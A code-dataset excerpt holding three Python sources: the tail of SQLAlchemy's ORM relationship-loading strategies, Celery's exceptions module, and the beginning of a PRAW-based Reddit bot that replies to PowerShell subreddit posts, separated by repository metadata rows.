self._bind_to_col, \
self._equated_columns
else:
criterion, bind_to_col, rev = \
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns
if reverse_direction:
mapper = self.parent_property.mapper
else:
mapper = self.parent_property.parent
o = state.obj() # strong ref
dict_ = attributes.instance_dict(o)
# use the "committed state" only if we're in a flush
# for this state.
if passive and passive & attributes.LOAD_AGAINST_COMMITTED:
def visit_bindparam(bindparam):
if bindparam._identifying_key in bind_to_col:
bindparam.callable = \
lambda: mapper._get_committed_state_attr_by_column(
state, dict_,
bind_to_col[bindparam._identifying_key])
else:
def visit_bindparam(bindparam):
if bindparam._identifying_key in bind_to_col:
bindparam.callable = \
lambda: mapper._get_state_attr_by_column(
state, dict_,
bind_to_col[bindparam._identifying_key])
if self.parent_property.secondary is not None and alias_secondary:
criterion = sql_util.ClauseAdapter(
self.parent_property.secondary.alias()).\
traverse(criterion)
criterion = visitors.cloned_traverse(
criterion, {}, {'bindparam': visit_bindparam})
if adapt_source:
criterion = adapt_source(criterion)
return criterion
def _lazy_none_clause(self, reverse_direction=False, adapt_source=None):
if not reverse_direction:
criterion, bind_to_col, rev = \
self._lazywhere, \
self._bind_to_col,\
self._equated_columns
else:
criterion, bind_to_col, rev = \
self._rev_lazywhere, \
self._rev_bind_to_col, \
self._rev_equated_columns
criterion = sql_util.adapt_criterion_to_null(criterion, bind_to_col)
if adapt_source:
criterion = adapt_source(criterion)
return criterion
def _load_for_state(self, state, passive):
if not state.key and \
(
(
not self.parent_property.load_on_pending
and not state._load_pending
)
or not state.session_id
):
return attributes.ATTR_EMPTY
pending = not state.key
ident_key = None
if (
(not passive & attributes.SQL_OK and not self.use_get)
or
(not passive & attributes.NON_PERSISTENT_OK and pending)
):
return attributes.PASSIVE_NO_RESULT
session = _state_session(state)
if not session:
raise orm_exc.DetachedInstanceError(
"Parent instance %s is not bound to a Session; "
"lazy load operation of attribute '%s' cannot proceed" %
(orm_util.state_str(state), self.key)
)
# if we have a simple primary key load, check the
# identity map without generating a Query at all
if self.use_get:
ident = self._get_ident_for_use_get(
session,
state,
passive
)
if attributes.PASSIVE_NO_RESULT in ident:
return attributes.PASSIVE_NO_RESULT
elif attributes.NEVER_SET in ident:
return attributes.NEVER_SET
if _none_set.issuperset(ident):
return None
ident_key = self.mapper.identity_key_from_primary_key(ident)
instance = loading.get_from_identity(session, ident_key, passive)
if instance is not None:
return instance
elif not passive & attributes.SQL_OK or \
not passive & attributes.RELATED_OBJECT_OK:
return attributes.PASSIVE_NO_RESULT
return self._emit_lazyload(session, state, ident_key, passive)
def _get_ident_for_use_get(self, session, state, passive):
instance_mapper = state.manager.mapper
if passive & attributes.LOAD_AGAINST_COMMITTED:
get_attr = instance_mapper._get_committed_state_attr_by_column
else:
get_attr = instance_mapper._get_state_attr_by_column
dict_ = state.dict
return [
get_attr(
state,
dict_,
self._equated_columns[pk],
passive=passive)
for pk in self.mapper.primary_key
]
@util.dependencies("sqlalchemy.orm.strategy_options")
def _emit_lazyload(self, strategy_options, session, state, ident_key, passive):
q = session.query(self.mapper)._adapt_all_clauses()
if self.parent_property.secondary is not None:
q = q.select_from(self.mapper, self.parent_property.secondary)
q = q._with_invoke_all_eagers(False)
pending = not state.key
# don't autoflush on pending
if pending or passive & attributes.NO_AUTOFLUSH:
q = q.autoflush(False)
if state.load_path:
q = q._with_current_path(state.load_path[self.parent_property])
if state.load_options:
q = q._conditional_options(*state.load_options)
if self.use_get:
return loading.load_on_ident(q, ident_key)
if self.parent_property.order_by:
q = q.order_by(*util.to_list(self.parent_property.order_by))
for rev in self.parent_property._reverse_property:
# reverse props that are MANYTOONE are loading *this*
# object from get(), so don't need to eager out to those.
if rev.direction is interfaces.MANYTOONE and \
rev._use_get and \
not isinstance(rev.strategy, LazyLoader):
q = q.options(strategy_options.Load(rev.parent).lazyload(rev.key))
lazy_clause = self.lazy_clause(state, passive=passive)
if pending:
bind_values = sql_util.bind_values(lazy_clause)
if None in bind_values:
return None
q = q.filter(lazy_clause)
result = q.all()
if self.uselist:
return result
else:
l = len(result)
if l:
if l > 1:
util.warn(
"Multiple rows returned with "
"uselist=False for lazily-loaded attribute '%s' "
% self.parent_property)
return result[0]
else:
return None
def create_row_processor(self, context, path, loadopt,
mapper, row, adapter):
key = self.key
if not self.is_class_level:
# we are not the primary manager for this attribute
# on this class - set up a
# per-instance lazyloader, which will override the
# class-level behavior.
# this currently only happens when using a
# "lazyload" option on a "no load"
# attribute - "eager" attributes always have a
# class-level lazyloader installed.
set_lazy_callable = InstanceState._row_processor(
mapper.class_manager,
LoadLazyAttribute(key), key)
return set_lazy_callable, None, None
else:
def reset_for_lazy_callable(state, dict_, row):
# we are the primary manager for this attribute on
# this class - reset its
# per-instance attribute state, so that the class-level
# lazy loader is
# executed when next referenced on this instance.
# this is needed in
# populate_existing() types of scenarios to reset
# any existing state.
state._reset(dict_, key)
return reset_for_lazy_callable, None, None
class LoadLazyAttribute(object):
"""serializable loader object used by LazyLoader"""
def __init__(self, key):
self.key = key
def __call__(self, state, passive=attributes.PASSIVE_OFF):
key = self.key
instance_mapper = state.manager.mapper
prop = instance_mapper._props[key]
strategy = prop._strategies[LazyLoader]
return strategy._load_for_state(state, passive)
@properties.RelationshipProperty.strategy_for(lazy="immediate")
class ImmediateLoader(AbstractRelationshipLoader):
def init_class_attribute(self, mapper):
self.parent_property.\
_get_strategy_by_cls(LazyLoader).\
init_class_attribute(mapper)
def setup_query(self, context, entity,
path, loadopt, adapter, column_collection=None,
parentmapper=None, **kwargs):
pass
def create_row_processor(self, context, path, loadopt,
mapper, row, adapter):
def load_immediate(state, dict_, row):
state.get_impl(self.key).get(state, dict_)
return None, None, load_immediate
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="subquery")
class SubqueryLoader(AbstractRelationshipLoader):
def __init__(self, parent):
super(SubqueryLoader, self).__init__(parent)
self.join_depth = self.parent_property.join_depth
def init_class_attribute(self, mapper):
self.parent_property.\
_get_strategy_by_cls(LazyLoader).\
init_class_attribute(mapper)
def setup_query(self, context, entity,
path, loadopt, adapter,
column_collection=None,
parentmapper=None, **kwargs):
if not context.query._enable_eagerloads:
return
path = path[self.parent_property]
# build up a path indicating the path from the leftmost
# entity to the thing we're subquery loading.
with_poly_info = path.get(context.attributes,
"path_with_polymorphic", None)
if with_poly_info is not None:
effective_entity = with_poly_info.entity
else:
effective_entity = self.mapper
subq_path = context.attributes.get(('subquery_path', None),
orm_util.PathRegistry.root)
subq_path = subq_path + path
# if not via query option, check for
# a cycle
if not path.contains(context.attributes, "loader"):
if self.join_depth:
if path.length / 2 > self.join_depth:
return
elif subq_path.contains_mapper(self.mapper):
return
subq_mapper, leftmost_mapper, leftmost_attr, leftmost_relationship = \
self._get_leftmost(subq_path)
orig_query = context.attributes.get(
("orig_query", SubqueryLoader),
context.query)
# generate a new Query from the original, then
# produce a subquery from it.
left_alias = self._generate_from_original_query(
orig_query, leftmost_mapper,
leftmost_attr, leftmost_relationship,
entity.mapper
)
# generate another Query that will join the
# left alias to the target relationships.
# basically doing a longhand
# "from_self()". (from_self() itself not quite industrial
# strength enough for all contingencies...but very close)
q = orig_query.session.query(effective_entity)
q._attributes = {
("orig_query", SubqueryLoader): orig_query,
('subquery_path', None): subq_path
}
q = q._enable_single_crit(False)
to_join, local_attr, parent_alias = \
self._prep_for_joins(left_alias, subq_path)
q = q.order_by(*local_attr)
q = q.add_columns(*local_attr)
q = self._apply_joins(q, to_join, left_alias,
parent_alias, effective_entity)
q = self._setup_options(q, subq_path, orig_query, effective_entity)
q = self._setup_outermost_orderby(q)
# add new query to attributes to be picked up
# by create_row_processor
path.set(context.attributes, "subquery", q)
def _get_leftmost(self, subq_path):
subq_path = subq_path.path
subq_mapper = orm_util._class_to_mapper(subq_path[0])
# determine attributes of the leftmost mapper
if self.parent.isa(subq_mapper) and self.parent_property is subq_path[1]:
leftmost_mapper, leftmost_prop = \
self.parent, self.parent_property
else:
leftmost_mapper, leftmost_prop = \
subq_mapper, \
subq_path[1]
leftmost_cols = leftmost_prop.local_columns
leftmost_attr = [
leftmost_mapper._columntoproperty[c].class_attribute
for c in leftmost_cols
]
return subq_mapper, leftmost_mapper, leftmost_attr, leftmost_prop
def _generate_from_original_query(self,
orig_query, leftmost_mapper,
leftmost_attr, leftmost_relationship,
entity_mapper
):
# reformat the original query
# to look only for significant columns
q = orig_query._clone().correlate(None)
# set a real "from" if not present, as this is more
# accurate than just going off of the column expression
if not q._from_obj and entity_mapper.isa(leftmost_mapper):
q._set_select_from([entity_mapper], False)
target_cols = q._adapt_col_list(leftmost_attr)
# select from the identity columns of the outer
q._set_entities(target_cols)
distinct_target_key = leftmost_relationship.distinct_target_key
if distinct_target_key is True:
q._distinct = True
elif distinct_target_key is None:
# if target_cols refer to a non-primary key or only
# part of a composite primary key, set the q as distinct
for t in set(c.table for c in target_cols):
if not set(target_cols).issuperset(t.primary_key):
q._distinct = True
break
if q._order_by is False:
q._order_by = leftmost_mapper.order_by
# don't need ORDER BY if no limit/offset
if q._limit is None and q._offset is None:
q._order_by = None
# the original query now becomes a subquery
# which we'll join onto.
embed_q = q.with_labels().subquery()
left_alias = orm_util.AliasedClass(leftmost_mapper, embed_q,
use_mapper_path=True)
return left_alias
def _prep_for_joins(self, left_alias, subq_path):
# figure out what's being joined. a.k.a. the fun part
to_join = []
pairs = list(subq_path.pairs())
for i, (mapper, prop) in enumerate(pairs):
if i > 0:
# look at the previous mapper in the chain -
# if it is as or more specific than this prop's
# mapper, use that instead.
# note we have an assumption here that
# the non-first element is always going to be a mapper,
# not an AliasedClass
prev_mapper = pairs[i - 1][1].mapper
to_append = prev_mapper if prev_mapper.isa(mapper) else mapper
else:
to_append = mapper
to_join.append((to_append, prop.key))
# determine the immediate parent class we are joining from,
# which needs to be aliased.
if len(to_join) > 1:
info = inspect(to_join[-1][0])
if len(to_join) < 2:
# in the case of a one level eager load, this is the
# leftmost "left_alias".
parent_alias = left_alias
elif info.mapper.isa(self.parent):
# In the case of multiple levels, retrieve
# it from subq_path[-2]. This is the same as self.parent
# in the vast majority of cases, and [ticket:2014]
# illustrates a case where sub_path[-2] is a subclass
# of self.parent
parent_alias = orm_util.AliasedClass(to_join[-1][0],
use_mapper_path=True)
else:
# if of_type() were used leading to this relationship,
# self.parent is more specific than subq_path[-2]
parent_alias = orm_util.AliasedClass(self.parent,
use_mapper_path=True)
local_cols = self.parent_property.local_columns
local_attr = [
getattr(parent_alias, self.parent._columntoproperty[c].key)
for c in local_cols
]
return to_join, local_attr, parent_alias
def _apply_joins(self, q, to_join, left_alias, parent_alias,
effective_entity):
for i, (mapper, key) in enumerate(to_join):
# we need to use query.join() as opposed to
# orm.join() here because of the
# rich behavior it brings when dealing with
# "with_polymorphic" mappers. "aliased"
# and "from_joinpoint" take care of most of
# the chaining and aliasing for us.
first = i == 0
middle = i < len(to_join) - 1
second_to_last = i == len(to_join) - 2
last = i == len(to_join) - 1
if first:
attr = getattr(left_alias, key)
if last and effective_entity is not self.mapper:
attr = attr.of_type(effective_entity)
else:
if last and effective_entity is not self.mapper:
attr = getattr(parent_alias, key).\
of_type(effective_entity)
else:
attr = key
if second_to_last:
q = q.join(parent_alias, attr, from_joinpoint=True)
else:
q = q.join(attr, aliased=middle, from_joinpoint=True)
return q
def _setup_options(self, q, subq_path, orig_query, effective_entity):
# propagate loader options etc. to the new query.
# these will fire relative to subq_path.
q = q._with_current_path(subq_path)
q = q._conditional_options(*orig_query._with_options)
if orig_query._populate_existing:
q._populate_existing = orig_query._populate_existing
return q
def _setup_outermost_orderby(self, q):
if self.parent_property.order_by:
# if there's an ORDER BY, alias it the same
# way joinedloader does, but we have to pull out
# the "eagerjoin" from the query.
# this really only picks up the "secondary" table
# right now.
eagerjoin = q._from_obj[0]
eager_order_by = \
eagerjoin._target_adapter.\
copy_and_process(
util.to_list(
self.parent_property.order_by
)
)
q = q.order_by(*eager_order_by)
return q
class _SubqCollections(object):
"""Given a :class:`.Query` used to emit the "subquery load",
provide a load interface that executes the query at the
first moment a value is needed.
"""
_data = None
def __init__(self, subq):
self.subq = subq
def get(self, key, default):
if self._data is None:
self._load()
return self._data.get(key, default)
def _load(self):
self._data = dict(
(k, [vv[0] for vv in v])
for k, v in itertools.groupby(
self.subq,
lambda x: x[1:]
)
)
def loader(self, state, dict_, row):
if self._data is None:
self._load()
def create_row_processor(self, context, path, loadopt,
mapper, row, adapter):
if not self.parent.class_manager[self.key].impl.supports_population:
raise sa_exc.InvalidRequestError(
"'%s' does not support object "
"population - eager loading cannot be applied." %
self)
path = path[self.parent_property]
subq = path.get(context.attributes, 'subquery')
if subq is None:
return None, None, None
local_cols = self.parent_property.local_columns
# cache the loaded collections in the context
# so that inheriting mappers don't re-load when they
# call upon create_row_processor again
collections = path.get(context.attributes, "collections")
if collections is None:
collections = self._SubqCollections(subq)
path.set(context.attributes, 'collections', collections)
if adapter:
local_cols = [adapter.columns[c] for c in local_cols]
if self.uselist:
return self._create_collection_loader(collections, local_cols)
else:
return self._create_scalar_loader(collections, local_cols)
def _create_collection_loader(self, collections, local_cols):
def load_collection_from_subq(state, dict_, row):
collection = collections.get(
tuple([row[col] for col in local_cols]),
()
)
state.get_impl(self.key).\
set_committed_value(state, dict_, collection)
return load_collection_from_subq, None, None, collections.loader
def _create_scalar_loader(self, collections, local_cols):
def load_scalar_from_subq(state, dict_, row):
collection = collections.get(
tuple([row[col] for col in local_cols]),
(None,)
)
if len(collection) > 1:
util.warn(
"Multiple rows returned with "
"uselist=False for eagerly-loaded attribute '%s' "
% self)
scalar = collection[0]
state.get_impl(self.key).\
set_committed_value(state, dict_, scalar)
return load_scalar_from_subq, None, None, collections.loader
@log.class_logger
@properties.RelationshipProperty.strategy_for(lazy="joined")
@properties.RelationshipProperty.strategy_for(lazy=False)
class JoinedLoader(AbstractRelationshipLoader):
"""Provide loading behavior for a :class:`.RelationshipProperty`
using joined eager loading.
"""
def __init__(self, parent):
super(JoinedLoader, self).__init__(parent)
self.join_depth = self.parent_property.join_depth
def init_class_attribute(self, mapper):
self.parent_property.\
_get_strategy_by_cls(LazyLoader).init_class_attribute(mapper)
def setup_query(self, context, entity, path, loadopt, adapter, \
column_collection=None, parentmapper=None,
**kwargs):
"""Add a left outer join to the statement thats being constructed."""
if not context.query._enable_eagerloads:
return
path = path[self.parent_property]
with_polymorphic = None
user_defined_adapter = self._init_user_defined_eager_proc(
loadopt, context) if loadopt else False
if user_defined_adapter is not False:
clauses, adapter, add_to_collection = \
self._setup_query_on_user_defined_adapter(
context, entity, path, adapter,
user_defined_adapter
)
else:
# if not via query option, check for
# a cycle
if not path.contains(context.attributes, "loader"):
if self.join_depth:
if path.length / 2 > self.join_depth:
return
elif path.contains_mapper(self.mapper):
return
clauses, adapter, add_to_collection = self._generate_row_adapter(
context, entity, path, loadopt, adapter,
column_collection, parentmapper
)
with_poly_info = path.get(
context.attributes,
"path_with_polymorphic",
None
)
if with_poly_info is not None:
with_polymorphic = with_poly_info.with_polymorphic_mappers
else:
with_polymorphic = None
path = path[self.mapper]
for value in self.mapper._iterate_polymorphic_properties(
mappers=with_polymorphic):
value.setup(
context,
entity,
path,
clauses,
parentmapper=self.mapper,
column_collection=add_to_collection)
if with_poly_info is not None and \
None in set(context.secondary_columns):
raise sa_exc.InvalidRequestError(
"Detected unaliased columns when generating joined "
"load. Make sure to use aliased=True or flat=True "
"when using joined loading with with_polymorphic()."
)
def _init_user_defined_eager_proc(self, loadopt, context):
# check if the opt applies at all
if "eager_from_alias" not in loadopt.local_opts:
# nope
return False
path = loadopt.path.parent
# the option applies. check if the "user_defined_eager_row_processor"
# has been built up.
adapter = path.get(context.attributes,
"user_defined_eager_row_processor", False)
if adapter is not False:
# just return it
return adapter
# otherwise figure it out.
alias = loadopt.local_opts["eager_from_alias"]
root_mapper, prop = path[-2:]
#from .mapper import Mapper
#from .interfaces import MapperProperty
#assert isinstance(root_mapper, Mapper)
#assert isinstance(prop, MapperProperty)
if alias is not None:
if isinstance(alias, str):
alias = prop.target.alias(alias)
adapter = sql_util.ColumnAdapter(alias,
equivalents=prop.mapper._equivalent_columns)
else:
if path.contains(context.attributes, "path_with_polymorphic"):
with_poly_info = path.get(context.attributes,
"path_with_polymorphic")
adapter = orm_util.ORMAdapter(
with_poly_info.entity,
equivalents=prop.mapper._equivalent_columns)
else:
adapter = context.query._polymorphic_adapters.get(prop.mapper, None)
path.set(context.attributes,
"user_defined_eager_row_processor",
adapter)
return adapter
def _setup_query_on_user_defined_adapter(self, context, entity,
path, adapter, user_defined_adapter):
# apply some more wrapping to the "user defined adapter"
# if we are setting up the query for SQL render.
adapter = entity._get_entity_clauses(context.query, context)
if adapter and user_defined_adapter:
user_defined_adapter = user_defined_adapter.wrap(adapter)
path.set(context.attributes, "user_defined_eager_row_processor",
user_defined_adapter)
elif adapter:
user_defined_adapter = adapter
path.set(context.attributes, "user_defined_eager_row_processor",
user_defined_adapter)
add_to_collection = context.primary_columns
return user_defined_adapter, adapter, add_to_collection
def _generate_row_adapter(self,
context, entity, path, loadopt, adapter,
column_collection, parentmapper
):
with_poly_info = path.get(
context.attributes,
"path_with_polymorphic",
None
)
if with_poly_info:
to_adapt = with_poly_info.entity
else:
to_adapt = orm_util.AliasedClass(self.mapper,
flat=True,
use_mapper_path=True)
clauses = orm_util.ORMAdapter(
to_adapt,
equivalents=self.mapper._equivalent_columns,
adapt_required=True)
assert clauses.aliased_class is not None
if self.parent_property.direction != interfaces.MANYTOONE:
context.multi_row_eager_loaders = True
innerjoin = (
loadopt.local_opts.get(
'innerjoin', self.parent_property.innerjoin)
if loadopt is not None
else self.parent_property.innerjoin
)
context.create_eager_joins.append(
(self._create_eager_join, context,
entity, path, adapter,
parentmapper, clauses, innerjoin)
)
add_to_collection = context.secondary_columns
path.set(context.attributes, "eager_row_processor", clauses)
return clauses, adapter, add_to_collection
def _create_eager_join(self, context, entity,
path, adapter, parentmapper,
clauses, innerjoin):
if parentmapper is None:
localparent = entity.mapper
else:
localparent = parentmapper
# whether or not the Query will wrap the selectable in a subquery,
# and then attach eager load joins to that (i.e., in the case of
# LIMIT/OFFSET etc.)
should_nest_selectable = context.multi_row_eager_loaders and \
context.query._should_nest_selectable
entity_key = None
if entity not in context.eager_joins and \
not should_nest_selectable and \
context.from_clause:
index, clause = \
sql_util.find_join_source(
context.from_clause, entity.selectable)
if clause is not None:
# join to an existing FROM clause on the query.
# key it to its list index in the eager_joins dict.
# Query._compile_context will adapt as needed and
# append to the FROM clause of the select().
entity_key, default_towrap = index, clause
if entity_key is None:
entity_key, default_towrap = entity, entity.selectable
towrap = context.eager_joins.setdefault(entity_key, default_towrap)
if adapter:
if getattr(adapter, 'aliased_class', None):
onclause = getattr(
adapter.aliased_class, self.key,
self.parent_property)
else:
onclause = getattr(
orm_util.AliasedClass(
self.parent,
adapter.selectable,
use_mapper_path=True
),
self.key, self.parent_property
)
else:
onclause = self.parent_property
assert clauses.aliased_class is not None
join_to_outer = innerjoin and isinstance(towrap, sql.Join) and towrap.isouter
if join_to_outer and innerjoin == 'nested':
inner = orm_util.join(
towrap.right,
clauses.aliased_class,
onclause,
isouter=False
)
eagerjoin = orm_util.join(
towrap.left,
inner,
towrap.onclause,
isouter=True
)
eagerjoin._target_adapter = inner._target_adapter
else:
if join_to_outer:
innerjoin = False
eagerjoin = orm_util.join(
towrap,
clauses.aliased_class,
onclause,
isouter=not innerjoin
)
context.eager_joins[entity_key] = eagerjoin
# send a hint to the Query as to where it may "splice" this join
eagerjoin.stop_on = entity.selectable
if self.parent_property.secondary is None and \
not parentmapper:
# for parentclause that is the non-eager end of the join,
# ensure all the parent cols in the primaryjoin are actually
# in the
# columns clause (i.e. are not deferred), so that aliasing applied
# by the Query propagates those columns outward.
# This has the effect
# of "undefering" those columns.
for col in sql_util._find_columns(
self.parent_property.primaryjoin):
if localparent.mapped_table.c.contains_column(col):
if adapter:
col = adapter.columns[col]
context.primary_columns.append(col)
if self.parent_property.order_by:
context.eager_order_by += \
eagerjoin._target_adapter.\
copy_and_process(
util.to_list(
self.parent_property.order_by
)
)
def _create_eager_adapter(self, context, row, adapter, path, loadopt):
user_defined_adapter = self._init_user_defined_eager_proc(
loadopt, context) if loadopt else False
if user_defined_adapter is not False:
decorator = user_defined_adapter
# user defined eagerloads are part of the "primary"
# portion of the load.
# the adapters applied to the Query should be honored.
if context.adapter and decorator:
decorator = decorator.wrap(context.adapter)
elif context.adapter:
decorator = context.adapter
else:
decorator = path.get(context.attributes, "eager_row_processor")
if decorator is None:
return False
try:
self.mapper.identity_key_from_row(row, decorator)
return decorator
except KeyError:
# no identity key - dont return a row
# processor, will cause a degrade to lazy
return False
def create_row_processor(self, context, path, loadopt, mapper, row, adapter):
if not self.parent.class_manager[self.key].impl.supports_population:
raise sa_exc.InvalidRequestError(
"'%s' does not support object "
"population - eager loading cannot be applied." %
self)
our_path = path[self.parent_property]
eager_adapter = self._create_eager_adapter(
context,
row,
adapter, our_path, loadopt)
if eager_adapter is not False:
key = self.key
_instance = loading.instance_processor(
self.mapper,
context,
our_path[self.mapper],
eager_adapter)
if not self.uselist:
return self._create_scalar_loader(context, key, _instance)
else:
return self._create_collection_loader(context, key, _instance)
else:
return self.parent_property.\
_get_strategy_by_cls(LazyLoader).\
create_row_processor(
context, path, loadopt,
mapper, row, adapter)
def _create_collection_loader(self, context, key, _instance):
def load_collection_from_joined_new_row(state, dict_, row):
collection = attributes.init_state_collection(
state, dict_, key)
result_list = util.UniqueAppender(collection,
'append_without_event')
context.attributes[(state, key)] = result_list
_instance(row, result_list)
def load_collection_from_joined_existing_row(state, dict_, row):
if (state, key) in context.attributes:
result_list = context.attributes[(state, key)]
else:
# appender_key can be absent from context.attributes
# with isnew=False when self-referential eager loading
# is used; the same instance may be present in two
# distinct sets of result columns
collection = attributes.init_state_collection(state,
dict_, key)
result_list = util.UniqueAppender(
collection,
'append_without_event')
context.attributes[(state, key)] = result_list
_instance(row, result_list)
def load_collection_from_joined_exec(state, dict_, row):
_instance(row, None)
return load_collection_from_joined_new_row, \
load_collection_from_joined_existing_row, \
None, load_collection_from_joined_exec
def _create_scalar_loader(self, context, key, _instance):
def load_scalar_from_joined_new_row(state, dict_, row):
# set a scalar object instance directly on the parent
# object, bypassing InstrumentedAttribute event handlers.
dict_[key] = _instance(row, None)
def load_scalar_from_joined_existing_row(state, dict_, row):
# call _instance on the row, even though the object has
# been created, so that we further descend into properties
existing = _instance(row, None)
if existing is not None \
and key in dict_ \
and existing is not dict_[key]:
util.warn(
"Multiple rows returned with "
"uselist=False for eagerly-loaded attribute '%s' "
% self)
def load_scalar_from_joined_exec(state, dict_, row):
_instance(row, None)
return load_scalar_from_joined_new_row, \
load_scalar_from_joined_existing_row, \
None, load_scalar_from_joined_exec
def single_parent_validator(desc, prop):
def _do_check(state, value, oldvalue, initiator):
if value is not None and initiator.key == prop.key:
hasparent = initiator.hasparent(attributes.instance_state(value))
if hasparent and oldvalue is not value:
raise sa_exc.InvalidRequestError(
"Instance %s is already associated with an instance "
"of %s via its %s attribute, and is only allowed a "
"single parent." %
(orm_util.instance_str(value), state.class_, prop)
)
return value
def append(state, value, initiator):
return _do_check(state, value, None, initiator)
def set_(state, value, oldvalue, initiator):
return _do_check(state, value, oldvalue, initiator)
event.listen(desc, 'append', append, raw=True, retval=True,
active_history=True)
event.listen(desc, 'set', set_, raw=True, retval=True,
active_history=True)
| 38.276712
| 85
| 0.568249
|
4a07e7f2daa5a4b8726f1363698797ba9c2bb0f7
| 2,837
|
py
|
Python
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 1
|
2015-07-13T03:29:04.000Z
|
2015-07-13T03:29:04.000Z
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 2
|
2015-03-03T23:02:19.000Z
|
2019-03-30T04:45:51.000Z
|
vendor-local/lib/python/celery/exceptions.py
|
Mozilla-GitHub-Standards/6f0d85288b5b0ef8beecb60345173dc14c98e40f48e1307a444ab1e08231e695
|
bf6a382913901ad193d907f022086931df0de8c4
|
[
"BSD-3-Clause"
] | 2
|
2016-04-15T11:43:05.000Z
|
2016-04-15T11:43:15.000Z
|
# -*- coding: utf-8 -*-
"""
celery.exceptions
~~~~~~~~~~~~~~~~~
This module contains all exceptions used by the Celery API.
"""
from __future__ import absolute_import
from billiard.exceptions import ( # noqa
SoftTimeLimitExceeded, TimeLimitExceeded, WorkerLostError, Terminated,
)
UNREGISTERED_FMT = """\
Task of kind %s is not registered, please make sure it's imported.\
"""
class SecurityError(Exception):
"""Security related exceptions.
Handle with care.
"""
class Ignore(Exception):
"""A task can raise this to ignore doing state updates."""
class SystemTerminate(SystemExit):
"""Signals that the worker should terminate."""
class QueueNotFound(KeyError):
"""Task routed to a queue not in CELERY_QUEUES."""
class ImproperlyConfigured(ImportError):
"""Celery is somehow improperly configured."""
class NotRegistered(KeyError):
"""The task is not registered."""
def __repr__(self):
return UNREGISTERED_FMT % str(self)
class AlreadyRegistered(Exception):
"""The task is already registered."""
class TimeoutError(Exception):
"""The operation timed out."""
class MaxRetriesExceededError(Exception):
"""The tasks max restart limit has been exceeded."""
class RetryTaskError(Exception):
"""The task is to be retried later."""
def __init__(self, message=None, exc=None, when=None, **kwargs):
from kombu.utils.encoding import safe_repr
self.message = message
if isinstance(exc, basestring):
self.exc, self.excs = None, exc
else:
self.exc, self.excs = exc, safe_repr(exc) if exc else None
self.when = when
Exception.__init__(self, exc, when, **kwargs)
def humanize(self):
if isinstance(self.when, int):
return 'in %ss' % self.when
return 'at %s' % (self.when, )
def __str__(self):
if self.message:
return self.message
if self.excs:
return 'Retry %s: %r' % (self.humanize(), self.excs)
return 'Retry %s' % self.humanize()
def __reduce__(self):
return self.__class__, (self.message, self.excs, self.when)
class TaskRevokedError(Exception):
"""The task has been revoked, so no result available."""
class NotConfigured(UserWarning):
"""Celery has not been configured, as no config module has been found."""
class AlwaysEagerIgnored(UserWarning):
"""send_task ignores CELERY_ALWAYS_EAGER option"""
class InvalidTaskError(Exception):
"""The task has invalid data or is not properly constructed."""
class CPendingDeprecationWarning(PendingDeprecationWarning):
pass
class CDeprecationWarning(DeprecationWarning):
pass
class IncompleteStream(Exception):
"""Found the end of a stream of data, but the data is not yet complete."""
| 24.042373
| 78
| 0.670779
|
4a07e855f1f11c1aca7ba2a099f714fc1fb80962
| 6,505
|
py
|
Python
|
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | 4
|
2019-02-03T21:01:30.000Z
|
2019-04-15T19:09:27.000Z
|
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | null | null | null |
strategy.py
|
Pyprohly/powershell-bot
|
8da0831f09af95b2524a1988c44b6d6cb6d0ae0b
|
[
"MIT"
] | null | null | null |
import os
import time
import logging
from pathlib import Path
import re
import praw, prawcore
from reddit import reddit
import db_services
from regex_checks import TopicFlags, ExtraFlags, match_control
from messages import get_message
from powershell_bot import register
script_path = Path(__file__).resolve()
os.chdir(script_path.parent)
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
#logger.addHandler(logging.StreamHandler())
#logger.disabled = True
log_file = script_path.parent / 'log' / 'powershell_bot.log'
if log_file.parent.is_dir():
log_format = '%(asctime)s %(levelname)s %(funcName)s:%(lineno)d | %(message)s'
rfh_config = {
'filename': log_file,
'encoding': 'utf-8',
'maxBytes': 5*1024*1024, # 5 megabytes
'backupCount': 8
}
rfh = logging.handlers.RotatingFileHandler(**rfh_config)
rfh.setFormatter(logging.Formatter(log_format))
logger.addHandler(rfh)
logger.info('Log ({}): {}'.format(logger.name, log_file.absolute()))
delete_command_pattern = r'^!delete(?: |\+)+(?:(t1)_)?([a-z0-9]{1,12})$'
delete_regexp = re.compile(delete_command_pattern, re.I)
recheck_command_pattern = r'^!recheck +(?:(t[1-6])_)?([a-z0-9]{1,12})$'
recheck_regexp = re.compile(recheck_command_pattern, re.I)
ignore_inbox_items_older_than = 60 * 2 # 2 minutes
me = reddit.user.me()
if me is None:
raise RuntimeError('user authentication required')
trustees = [i.lower() for i in (register['owner'], me.name)]
def process_subsmission(submission):
if not submission.is_self:
logger.info('Skip: link submission: {}'.format(submission.permalink))
return
# Rough check to see if bot hasn't replied already
submission.comments.replace_more(limit=0)
if any(1 for comment in submission.comments if comment.author == me):
logger.warning('Skip: already replied to: {}'.format(submission.permalink))
return
match_control.check_all(submission.selftext)
b = match_control[TopicFlags]
y = match_control[ExtraFlags]
if b == 0:
logger.info('Skip: no match: {}'.format(submission.permalink))
return
logger.info('Process submission: {}'.format(submission.permalink))
message_kwargs = {
'topic_flags': b,
'signature': 1,
'pester': True,
'passed': False,
'some': bool(y & ExtraFlags.contains_code_block),
'thing_kind': type(submission).__name__,
'redditor': submission.author.name,
'old_reddit_permalink': 'https://old.reddit.com' + submission.permalink,
'new_reddit_permalink': 'https://new.reddit.com' + submission.permalink
}
message = get_message(**message_kwargs)
reply = submission.reply(message)
message_kwargs.update({
'signature': 2,
'bot_name': me.name,
'reply_id': reply.id
})
message = get_message(**message_kwargs)
reply.edit(message)
db_services.record_submission_reply(submission, reply, b, y)
def process_inbox_item(item):
